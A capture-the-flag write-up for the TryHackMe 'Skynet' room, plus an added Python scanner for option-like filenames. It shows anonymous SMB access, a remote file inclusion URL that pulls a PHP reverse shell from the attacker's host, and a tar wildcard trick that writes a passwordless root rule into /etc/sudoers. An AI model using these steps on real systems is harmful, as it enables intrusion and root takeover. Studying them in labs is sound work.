Terminator? I don't even know her! (Enter 90's laugh track here). No but seriously, the Skynet Try Hack Me CTF was so much fun and it was challenging, and so I had to write a write-up on it! When you're ready, put up your imaginary Terminator posters, and let's "get back" to it! 😆
Just a quick note before we start. If you run the IP address of your given machine in the browser, you are met with a "search engine" that does not work. I just wanted to get it out of the way before we start, because this page is useless and I don't want to leave you wondering.
Before we get crackalacking at Miles' emails, we need to do some basic enumeration. Let's start with an nmap scan to see what services are running on the open ports. Take note of the Samba smbd service that is running, because it means we can enumerate its shares with smbclient!
We can identify two important shares: milesdyson and anonymous. When we try to log in to milesdyson without a username/password we get an access denied status, yet we can log in to anonymous this way.
smbclient //10.10.58.198/anonymous -U ""%""
When we read the attention.txt file from the anonymous share we can see that all users had to change their passwords. When we read the logs we can see that they contain all the changed passwords! (Only log1.txt contains any data; log2.txt and log3.txt are empty.)
Copy the data from log1.txt into a .txt file on your Desktop, or download it from smb and copy it. Then create a file named users.txt in the same directory as your log1.txt and insert one value into it: "Miles".
Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator’s goal is to exploit the referencing function in an application to upload malware (e.g., backdoor shells) from a remote URL located within a different domain.
Okay, let's get our reverse shell going. To make it easy for you, you can just open up your terminal and run the following command to pull one from Pentestmonkey's GitHub.
With our reverse shell downloaded, we need to change two values: our IP address and our port. I keep my port at the default 1234, because I don't care. Change the IP address in your php-reverse-shell.php script to the IP address of your OPENVPN/attacker machine, not your lab's target machine. I did this via vim, but you can do it manually by navigating to it if you want.
Now, go back to your browser and enter the following URL (replacing the IPs with your values).
http://<machine IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<OPENVPN IP>:8000/php-reverse-shell.php
This backup script opens a shell, changes to the /var/www/html directory and creates a backup of everything in that directory. Read more on how we can exploit this on GTFOBins, but for now, I'm just going to show you.
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > sudo.sh
touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh"
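From the defender's side, here is an added example (my own code, not part of the original write-up or the CTF) that scans a directory for filenames a wildcard tar would parse as options, the exact condition the backup script above is abused through, and shows the form of tar command that avoids it. The directory contents, the option list and the function names are constructed for the demo.

```python
import os
import tempfile
from pathlib import Path

# When a cron job runs "tar cf backup.tgz *" inside a directory the web user can
# write to, the shell expands "*" and any name beginning with "-" becomes a tar
# option. These options let tar run arbitrary commands, so they are high risk.
HIGH_RISK_OPTIONS = ("--checkpoint", "--to-command", "--rsh-command", "--use-compress-program")

def option_like_filenames(directory):
    """Return (name, severity) for every entry a glob would hand to tar as an option."""
    findings = []
    for entry in sorted(os.listdir(directory)):
        if not entry.startswith("-"):
            continue
        option = entry.split("=", 1)[0]          # strip any "=value" part
        severity = "high" if option.startswith(HIGH_RISK_OPTIONS) else "low"
        findings.append((entry, severity))
    return findings

def safe_tar_command(directory, archive):
    """Build a backup command that never globs the directory contents.
    '-C directory .' makes tar enter the directory and archive '.', so a file
    named '--checkpoint-action=...' is stored as data, not parsed as an option."""
    return ["tar", "-czf", archive, "-C", directory, "."]

def demo():
    """Constructed web root: one legitimate file and two option-like names."""
    with tempfile.TemporaryDirectory() as webroot:
        for name in ("index.html", "--checkpoint-action=exec=sh sudo.sh", "--verbose"):
            Path(webroot, name).write_text("placeholder\n")
        return option_like_filenames(webroot)

if __name__ == "__main__":
    for name, severity in demo():
        print(f"{severity:4}  {name!r}")
    print(" ".join(safe_tar_command("/var/www/html", "/tmp/backup.tgz")))
```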
Congratulations! You have successfully completed the Skynet CTF. I hope this was easy enough to follow, and that you had fun along the way. Until next time, happy hacking! 😊
Visit my GitHub for more.